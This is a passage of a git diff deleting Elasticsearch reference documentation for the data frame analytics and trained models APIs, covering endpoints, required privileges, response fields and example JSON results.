--------------------------------------------------- -// TEST[skip:TBD] - -<1> The evaluation type. -<2> The field that contains the ground truth value for the actual animal -classification. This is required in order to evaluate results. -<3> Specifies the metric for the evaluation. -<4> Specifies the class name that is treated as positive during the evaluation, -all the other classes are treated as negative. - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "classification" : { - "auc_roc" : { - "score" : 0.8941788639536681 - } - } -} --------------------------------------------------- -// TEST[skip:TBD] \ No newline at end of file diff --git a/docs/reference/ml/df-analytics/apis/explain-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/explain-dfanalytics.asciidoc deleted file mode 100644 index ccd33b8500e..00000000000 --- a/docs/reference/ml/df-analytics/apis/explain-dfanalytics.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[explain-dfanalytics]] -= Explain {dfanalytics} API - -[subs="attributes"] -++++ -Explain {dfanalytics} -++++ - -Explains a {dataframe-analytics-config}. - -experimental[] - - -[[ml-explain-dfanalytics-request]] -== {api-request-title} - -`GET _ml/data_frame/analytics/_explain` + - -`POST _ml/data_frame/analytics/_explain` + - -`GET _ml/data_frame/analytics//_explain` + - -`POST _ml/data_frame/analytics//_explain` - - -[[ml-explain-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-explain-dfanalytics-desc]] -== {api-description-title} - -This API provides explanations for a {dataframe-analytics-config} that either -exists already or one that has not been created yet. -The following explanations are provided: - -* which fields are included or not in the analysis and why, -* how much memory is estimated to be required. The estimate can be used when - deciding the appropriate value for `model_memory_limit` setting later on. - -If you have object fields or fields that are excluded via source filtering, -they are not included in the explanation. - - -[[ml-explain-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics] - -[[ml-explain-dfanalytics-request-body]] -== {api-request-body-title} - -A {dataframe-analytics-config} as described in <>. -Note that `id` and `dest` don't need to be provided in the context of this API. - -[role="child_attributes"] -[[ml-explain-dfanalytics-results]] -== {api-response-body-title} - -The API returns a response that contains the following: - -`field_selection`:: -(array) -An array of objects that explain selection for each field, sorted by -the field names. -+ -.Properties of `field_selection` objects -[%collapsible%open] -==== -`is_included`::: -(Boolean) Whether the field is selected to be included in the analysis. - -`is_required`::: -(Boolean) Whether the field is required. - -`feature_type`::: -(string) The feature type of this field for the analysis. May be `categorical` -or `numerical`. - -`mapping_types`::: -(string) The mapping types of the field. - -`name`::: -(string) The field name. - -`reason`::: -(string) The reason a field is not selected to be included in the analysis. -==== - -`memory_estimation`:: -(object) -An object containing the memory estimates. -+ -.Properties of `memory_estimation` -[%collapsible%open] -==== -`expected_memory_with_disk`::: -(string) Estimated memory usage under the assumption that overflowing to disk is -allowed during {dfanalytics}. `expected_memory_with_disk` is usually smaller -than `expected_memory_without_disk` as using disk allows to limit the main -memory needed to perform {dfanalytics}. - -`expected_memory_without_disk`::: -(string) Estimated memory usage under the assumption that the whole -{dfanalytics} should happen in memory (i.e. without overflowing to disk). -==== - - - -[[ml-explain-dfanalytics-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/_explain -{ - "source": { - "index": "houses_sold_last_10_yrs" - }, - "analysis": { - "regression": { - "dependent_variable": "price" - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - - -The API returns the following results: - -[source,console-result] ----- -{ - "field_selection": [ - { - "field": "number_of_bedrooms", - "mappings_types": ["integer"], - "is_included": true, - "is_required": false, - "feature_type": "numerical" - }, - { - "field": "postcode", - "mappings_types": ["text"], - "is_included": false, - "is_required": false, - "reason": "[postcode.keyword] is preferred because it is aggregatable" - }, - { - "field": "postcode.keyword", - "mappings_types": ["keyword"], - "is_included": true, - "is_required": false, - "feature_type": "categorical" - }, - { - "field": "price", - "mappings_types": ["float"], - "is_included": true, - "is_required": true, - "feature_type": "numerical" - } - ], - "memory_estimation": { - "expected_memory_without_disk": "128MB", - "expected_memory_with_disk": "32MB" - } -} ----- diff --git a/docs/reference/ml/df-analytics/apis/get-dfanalytics-stats.asciidoc b/docs/reference/ml/df-analytics/apis/get-dfanalytics-stats.asciidoc deleted file mode 100644 index 333e7a017de..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-dfanalytics-stats.asciidoc +++ /dev/null @@ -1,601 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[get-dfanalytics-stats]] -= Get {dfanalytics-jobs} statistics API -[subs="attributes"] -++++ -Get {dfanalytics-jobs} stats -++++ - -Retrieves usage information for {dfanalytics-jobs}. - -experimental[] - -[[ml-get-dfanalytics-stats-request]] -== {api-request-title} - -`GET _ml/data_frame/analytics//_stats` + - -`GET _ml/data_frame/analytics/,/_stats` + - -`GET _ml/data_frame/analytics/_stats` + - -`GET _ml/data_frame/analytics/_all/_stats` + - -`GET _ml/data_frame/analytics/*/_stats` - - -[[ml-get-dfanalytics-stats-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - -[[ml-get-dfanalytics-stats-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default] - - -[[ml-get-dfanalytics-stats-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size] - -`verbose`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=verbose] - -[role="child_attributes"] -[[ml-get-dfanalytics-stats-response-body]] -== {api-response-body-title} - -`data_frame_analytics`:: -(array) -An array of objects that contain usage information for {dfanalytics-jobs}, which -are sorted by the `id` value in ascending order. -+ -.Properties of {dfanalytics-job} usage resources -[%collapsible%open] -==== -//Begin analysis_stats -`analysis_stats`::: -(object) -An object containing information about the analysis job. -+ -.Properties of `analysis_stats` -[%collapsible%open] -===== -//Begin classification_stats -`classification_stats`:::: -(object) -An object containing information about the {classanalysis} job. -+ -.Properties of `classification_stats` -[%collapsible%open] -====== -//Begin class_hyperparameters -`hyperparameters`:::: -(object) -An object containing the parameters of the {classanalysis} job. -+ -.Properties of `hyperparameters` -[%collapsible%open] -======= -`alpha`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-alpha] - -`class_assignment_objective`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=class-assignment-objective] - -`downsample_factor`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-downsample-factor] - -`eta`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`eta_growth_rate_per_tree`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-eta-growth] - -`feature_bag_fraction`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`gamma`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`max_attempts_to_add_tree`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-attempts] - -`max_optimization_rounds_per_hyperparameter`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-optimization-rounds] - -`max_trees`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_folds`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-folds] - -`num_splits_per_feature`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-splits] - -`soft_tree_depth_limit`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-limit] - -`soft_tree_depth_tolerance`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-tolerance] -======= -//End class_hyperparameters - -`iteration`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-iteration] - -`timestamp`:::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timestamp] - -//Begin class_timing_stats -`timing_stats`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats] -+ -.Properties of `timing_stats` -[%collapsible%open] -======= -`elapsed_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed] - -`iteration_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-iteration] -======= -//End class_timing_stats - -//Begin class_validation_loss -`validation_loss`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss] -+ -.Properties of `validation_loss` -[%collapsible%open] -======= -`fold_values`:::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-fold] - -`loss_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-type] -======= -//End class_validation_loss -====== -//End classification_stats - -//Begin outlier_detection_stats -`outlier_detection_stats`:::: -(object) -An object containing information about the {oldetection} job. -+ -.Properties of `outlier_detection_stats` -[%collapsible%open] -====== -//Begin parameters -`parameters`:::: -(object) -The list of job parameters specified by the user or determined by algorithmic -heuristics. -+ -.Properties of `parameters` -[%collapsible%open] -======= -`compute_feature_influence`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=compute-feature-influence] - -`feature_influence_threshold`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-influence-threshold] - -`method`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=method] - -`n_neighbors`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=n-neighbors] - -`outlier_fraction`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=outlier-fraction] - -`standardization_enabled`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=standardization-enabled] -======= -//End parameters - -`timestamp`:::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timestamp] - -//Begin od_timing_stats -`timing_stats`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats] -+ -.Property of `timing_stats` -[%collapsible%open] -======= -`elapsed_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed] -======= -//End od_timing_stats -====== -//End outlier_detection_stats - -//Begin regression_stats -`regression_stats`:::: -(object) -An object containing information about the {reganalysis}. -+ -.Properties of `regression_stats` -[%collapsible%open] -====== -//Begin reg_hyperparameters -`hyperparameters`:::: -(object) -An object containing the parameters of the {reganalysis}. -+ -.Properties of `hyperparameters` -[%collapsible%open] -======= -`alpha`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-alpha] - -`downsample_factor`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-downsample-factor] - -`eta`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=eta] - -`eta_growth_rate_per_tree`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-eta-growth] - -`feature_bag_fraction`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=feature-bag-fraction] - -`gamma`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=gamma] - -`lambda`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=lambda] - -`max_attempts_to_add_tree`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-attempts] - -`max_optimization_rounds_per_hyperparameter`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-max-optimization-rounds] - -`max_trees`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-trees] - -`num_folds`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-folds] - -`num_splits_per_feature`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-num-splits] - -`soft_tree_depth_limit`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-limit] - -`soft_tree_depth_tolerance`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-soft-tolerance] -======= -//End reg_hyperparameters - -`iteration`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-iteration] - -`timestamp`:::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timestamp] - -//Begin reg_timing_stats -`timing_stats`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats] -+ -.Propertis of `timing_stats` -[%collapsible%open] -======= -`elapsed_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-elapsed] - -`iteration_time`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-timing-stats-iteration] -======= -//End reg_timing_stats - -//Begin reg_validation_loss -`validation_loss`:::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss] -+ -.Properties of `validation_loss` -[%collapsible%open] -======= -`fold_values`:::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-fold] - -`loss_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dfas-validation-loss-type] -======= -//End reg_validation_loss -====== -//End regression_stats -===== -//End analysis_stats - - -`assignment_explanation`::: -(string) -For running jobs only, contains messages relating to the selection of a node to -run the job. - -//Begin data_counts -`data_counts`::: -(object) -An object that provides counts for the quantity of documents skipped, used in -training, or available for testing. -+ -.Properties of `data_counts` -[%collapsible%open] -===== -`skipped_docs_count`::: -(integer) -The number of documents that are skipped during the analysis because they -contained values that are not supported by the analysis. For example, -{oldetection} does not support missing fields so it skips documents with missing -fields. Likewise, all types of analysis skip documents that contain arrays with -more than one element. - -`test_docs_count`::: -(integer) -The number of documents that are not used for training the model and can be used -for testing. - -`training_docs_count`::: -(integer) -The number of documents that are used for training the model. -===== -//End data_counts - -`id`::: -(string) -The unique identifier of the {dfanalytics-job}. - -`memory_usage`::: -(Optional, object) -An object describing memory usage of the analytics. It is present only after the -job is started and memory usage is reported. -+ -.Properties of `memory_usage` -[%collapsible%open] -===== -`memory_reestimate_bytes`:::: -(long) -This value is present when the `status` is `hard_limit` and it -is a new estimate of how much memory the job needs. - -`peak_usage_bytes`:::: -(long) -The number of bytes used at the highest peak of memory usage. - -`status`:::: -(string) -The memory usage status. May have one of the following values: -+ --- -* `ok`: usage stayed below the limit. -* `hard_limit`: usage surpassed the configured memory limit. --- - -`timestamp`:::: -(date) -The timestamp when memory usage was calculated. -===== - -`node`::: -(object) -Contains properties for the node that runs the job. This information is -available only for running jobs. -+ -.Properties of `node` -[%collapsible%open] -===== -`attributes`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-attributes] - -`ephemeral_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-ephemeral-id] - -`id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-id] - -`name`::: -(string) -The node name. - -`transport_address`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-transport-address] -===== - -`progress`::: -(array) The progress report of the {dfanalytics-job} by phase. -+ -.Properties of phase objects -[%collapsible%open] -===== -`phase`::: -(string) Defines the phase of the {dfanalytics-job}. Possible phases: -* `reindexing`, -* `loading_data`, -* `computing_outliers` (for {oldetection} only), -* `feature_selection` (for {regression} and {classification} only), -* `coarse_parameter_search` (for {regression} and {classification} only), -* `fine_tuning_parameters` (for {regression} and {classification} only), -* `final_training` (for {regression} and {classification} only), -* `writing_results`, -* `inference` (for {regression} and {classification} only). -+ -To learn more about the different phases, refer to -{ml-docs}/ml-dfa-phases.html[How a {dfanalytics} job works]. - -`progress_percent`::: -(integer) The progress that the {dfanalytics-job} has made expressed in -percentage. -===== - -`state`::: -(string) The status of the {dfanalytics-job}, which can be one of the following -values: `analyzing`, `failed`, `reindexing`, `started`, `starting`, `stopped`, -`stopping`. -==== -//End of data_frame_analytics - -[[ml-get-dfanalytics-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - - -[[ml-get-dfanalytics-stats-example]] -== {api-examples-title} - -The following API retrieves usage information for the -{ml-docs}/ecommerce-outliers.html[{oldetection} {dfanalytics-job} example]: - -[source,console] --------------------------------------------------- -GET _ml/data_frame/analytics/ecommerce/_stats --------------------------------------------------- -// TEST[skip:Kibana sample data] - - -The API returns the following results: - -[source,console-result] ----- -{ - "count" : 1, - "data_frame_analytics" : [ - { - "id" : "ecommerce", - "state" : "stopped", - "progress" : [ - { - "phase" : "reindexing", - "progress_percent" : 100 - }, - { - "phase" : "loading_data", - "progress_percent" : 100 - }, - { - "phase" : "analyzing", - "progress_percent" : 100 - }, - { - "phase" : "writing_results", - "progress_percent" : 100 - } - ], - "data_counts" : { - "training_docs_count" : 3321, - "test_docs_count" : 0, - "skipped_docs_count" : 0 - }, - "memory_usage" : { - "timestamp" : 1586905058000, - "peak_usage_bytes" : 279484 - }, - "analysis_stats" : { - "outlier_detection_stats" : { - "timestamp" : 1586905058000, - "parameters" : { - "n_neighbors" : 0, - "method" : "ensemble", - "compute_feature_influence" : true, - "feature_influence_threshold" : 0.1, - "outlier_fraction" : 0.05, - "standardization_enabled" : true - }, - "timing_stats" : { - "elapsed_time" : 245 - } - } - } - } - ] -} ----- diff --git a/docs/reference/ml/df-analytics/apis/get-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/get-dfanalytics.asciidoc deleted file mode 100644 index cb1d5690afd..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-dfanalytics.asciidoc +++ /dev/null @@ -1,215 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[get-dfanalytics]] -= Get {dfanalytics-jobs} API -[subs="attributes"] -++++ -Get {dfanalytics-jobs} -++++ - -Retrieves configuration information for {dfanalytics-jobs}. - -experimental[] - - -[[ml-get-dfanalytics-request]] -== {api-request-title} - -`GET _ml/data_frame/analytics/` + - -`GET _ml/data_frame/analytics/,` + - -`GET _ml/data_frame/analytics/` + - -`GET _ml/data_frame/analytics/_all` - - -[[ml-get-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-get-dfanalytics-desc]] -== {api-description-title} - -You can get information for multiple {dfanalytics-jobs} in a single API request -by using a comma-separated list of {dfanalytics-jobs} or a wildcard expression. - - -[[ml-get-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default] -+ --- -You can get information for all {dfanalytics-jobs} by using _all, by specifying -`*` as the ``, or by omitting the -``. --- - - -[[ml-get-dfanalytics-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size] - -[role="child_attributes"] -[[ml-get-dfanalytics-results]] -== {api-response-body-title} - -`data_frame_analytics`:: -(array) -An array of {dfanalytics-job} resources, which are sorted by the `id` value in -ascending order. -+ -.Properties of {dfanalytics-job} resources -[%collapsible%open] -==== -`analysis`::: -(object) The type of analysis that is performed on the `source`. - -//Begin analyzed_fields -`analyzed_fields`::: -(object) Contains `includes` and/or `excludes` patterns that select which fields -are included in the analysis. -+ -.Properties of `analyzed_fields` -[%collapsible%open] -===== -`excludes`::: -(Optional, array) An array of strings that defines the fields that are excluded -from the analysis. - -`includes`::: -(Optional, array) An array of strings that defines the fields that are included -in the analysis. -===== -//End analyzed_fields -//Begin dest -`dest`::: -(string) The destination configuration of the analysis. -+ -.Properties of `dest` -[%collapsible%open] -===== -`index`::: -(string) The _destination index_ that stores the results of the -{dfanalytics-job}. - -`results_field`::: -(string) The name of the field that stores the results of the analysis. Defaults -to `ml`. -===== -//End dest - -`id`::: -(string) The unique identifier of the {dfanalytics-job}. - -`model_memory_limit`::: -(string) The `model_memory_limit` that has been set to the {dfanalytics-job}. - -`source`::: -(object) The configuration of how the analysis data is sourced. It has an -`index` parameter and optionally a `query` and a `_source`. -+ -.Properties of `source` -[%collapsible%open] -===== -`index`::: -(array) Index or indices on which to perform the analysis. It can be a single -index or index pattern as well as an array of indices or patterns. - -`query`::: -(object) The query that has been specified for the {dfanalytics-job}. The {es} -query domain-specific language (<>). This value corresponds to -the query object in an {es} search POST body. By default, this property has the -following value: `{"match_all": {}}`. - -`_source`::: -(object) Contains the specified `includes` and/or `excludes` patterns that -select which fields are present in the destination. Fields that are excluded -cannot be included in the analysis. -+ -.Properties of `_source` -[%collapsible%open] -====== -`excludes`::: -(array) An array of strings that defines the fields that are excluded from the -destination. - -`includes`::: -(array) An array of strings that defines the fields that are included in the -destination. -====== -//End of _source -===== -//End source -==== - - -[[ml-get-dfanalytics-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - - -[[ml-get-dfanalytics-example]] -== {api-examples-title} - -The following example gets configuration information for the `loganalytics` -{dfanalytics-job}: - -[source,console] --------------------------------------------------- -GET _ml/data_frame/analytics/loganalytics --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "data_frame_analytics": [ - { - "id": "loganalytics", - "source": { - "index": "logdata", - "query": { - "match_all": {} - } - }, - "dest": { - "index": "logdata_out", - "results_field": "ml" - }, - "analysis": { - "outlier_detection": {} - }, - "model_memory_limit": "1gb", - "create_time": 1562265491319, - "version": "8.0.0" - } - ] -} ----- diff --git a/docs/reference/ml/df-analytics/apis/get-trained-models-stats.asciidoc b/docs/reference/ml/df-analytics/apis/get-trained-models-stats.asciidoc deleted file mode 100644 index 3e70ed2abce..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-trained-models-stats.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-trained-models-stats]] -= Get trained models statistics API -[subs="attributes"] -++++ -Get trained models stats -++++ - -Retrieves usage information for trained models. - -experimental[] - - -[[ml-get-trained-models-stats-request]] -== {api-request-title} - -`GET _ml/trained_models/_stats` + - -`GET _ml/trained_models/_all/_stats` + - -`GET _ml/trained_models//_stats` + - -`GET _ml/trained_models/,/_stats` + - -`GET _ml/trained_models/,/_stats` - - -[[ml-get-trained-models-stats-prereq]] -== {api-prereq-title} - -Required privileges which should be added to a custom role: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - -[[ml-get-trained-models-stats-desc]] -== {api-description-title} - -You can get usage information for multiple trained models in a single API -request by using a comma-separated list of model IDs or a wildcard expression. - - -[[ml-get-trained-models-stats-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - - -[[ml-get-trained-models-stats-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match-models] - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from-models] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size-models] - -[role="child_attributes"] -[[ml-get-trained-models-stats-results]] -== {api-response-body-title} - -`count`:: -(integer) -The total number of trained model statistics that matched the requested ID -patterns. Could be higher than the number of items in the `trained_model_stats` -array as the size of the array is restricted by the supplied `size` parameter. - -`trained_model_stats`:: -(array) -An array of trained model statistics, which are sorted by the `model_id` value -in ascending order. -+ -.Properties of trained model stats -[%collapsible%open] -==== -`model_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - -`pipeline_count`::: -(integer) -The number of ingest pipelines that currently refer to the model. - -`inference_stats`::: -(object) -A collection of inference stats fields. -+ -.Properties of inference stats -[%collapsible%open] -===== - -`missing_all_fields_count`::: -(integer) -The number of inference calls where all the training features for the model -were missing. - -`inference_count`::: -(integer) -The total number of times the model has been called for inference. -This is across all inference contexts, including all pipelines. - -`cache_miss_count`::: -(integer) -The number of times the model was loaded for inference and was not retrieved -from the cache. If this number is close to the `inference_count`, then the cache -is not being appropriately used. This can be solved by increasing the cache size -or its time-to-live (TTL). See <> for the appropriate -settings. - -`failure_count`::: -(integer) -The number of failures when using the model for inference. - -`timestamp`::: -(<>) -The time when the statistics were last updated. -===== - -`ingest`::: -(object) -A collection of ingest stats for the model across all nodes. The values are -summations of the individual node statistics. The format matches the `ingest` -section in <>. - -==== - -[[ml-get-trained-models-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-trained-models-stats-example]] -== {api-examples-title} - -The following example gets usage information for all the trained models: - -[source,console] --------------------------------------------------- -GET _ml/trained_models/_stats --------------------------------------------------- -// TEST[skip:TBD] - - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 2, - "trained_model_stats": [ - { - "model_id": "flight-delay-prediction-1574775339910", - "pipeline_count": 0, - "inference_stats": { - "failure_count": 0, - "inference_count": 4, - "cache_miss_count": 3, - "missing_all_fields_count": 0, - "timestamp": 1592399986979 - } - }, - { - "model_id": "regression-job-one-1574775307356", - "pipeline_count": 1, - "inference_stats": { - "failure_count": 0, - "inference_count": 178, - "cache_miss_count": 3, - "missing_all_fields_count": 0, - "timestamp": 1592399986979 - }, - "ingest": { - "total": { - "count": 178, - "time_in_millis": 8, - "current": 0, - "failed": 0 - }, - "pipelines": { - "flight-delay": { - "count": 178, - "time_in_millis": 8, - "current": 0, - "failed": 0, - "processors": [ - { - "inference": { - "type": "inference", - "stats": { - "count": 178, - "time_in_millis": 7, - "current": 0, - "failed": 0 - } - } - } - ] - } - } - } - } - ] -} ----- -// NOTCONSOLE diff --git a/docs/reference/ml/df-analytics/apis/get-trained-models.asciidoc b/docs/reference/ml/df-analytics/apis/get-trained-models.asciidoc deleted file mode 100644 index 11124ab8d5b..00000000000 --- a/docs/reference/ml/df-analytics/apis/get-trained-models.asciidoc +++ /dev/null @@ -1,334 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-trained-models]] -= Get trained models API -[subs="attributes"] -++++ -Get trained models -++++ - -Retrieves configuration information for a trained model. - -experimental[] - - -[[ml-get-trained-models-request]] -== {api-request-title} - -`GET _ml/trained_models/` + - -`GET _ml/trained_models/` + - -`GET _ml/trained_models/_all` + - -`GET _ml/trained_models/,` + - -`GET _ml/trained_models/` - - -[[ml-get-trained-models-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -privileges: - -* cluster: `monitor_ml` - -For more information, see <> and -{ml-docs-setup-privileges}. - - -[[ml-get-trained-models-desc]] -== {api-description-title} - -You can get information for multiple trained models in a single API request by -using a comma-separated list of model IDs or a wildcard expression. - - -[[ml-get-trained-models-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - - -[[ml-get-trained-models-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match-models] - -`decompress_definition`:: -(Optional, Boolean) -Specifies whether the included model definition should be returned as a JSON map -(`true`) or in a custom compressed format (`false`). Defaults to `true`. - -`for_export`:: -(Optional, Boolean) -Indicates if certain fields should be removed from the model configuration on -retrieval. This allows the model to be in an acceptable format to be retrieved -and then added to another cluster. Default is false. - -`from`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=from-models] - -`include`:: -(Optional, string) -A comma delimited string of optional fields to include in the response body. The -default value is empty, indicating no optional fields are included. Valid -options are: - - `definition`: Includes the model definition - - `feature_importance_baseline`: Includes the baseline for {feat-imp} values. - - `total_feature_importance`: Includes the total {feat-imp} for the training - data set. -The baseline and total {feat-imp} values are returned in the `metadata` field -in the response body. - -`size`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=size-models] - -`tags`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=tags] - -[role="child_attributes"] -[[ml-get-trained-models-results]] -== {api-response-body-title} - -`trained_model_configs`:: -(array) -An array of trained model resources, which are sorted by the `model_id` value in -ascending order. -+ -.Properties of trained model resources -[%collapsible%open] -==== -`created_by`::: -(string) -Information on the creator of the trained model. - -`create_time`::: -(<>) -The time when the trained model was created. - -`default_field_map` 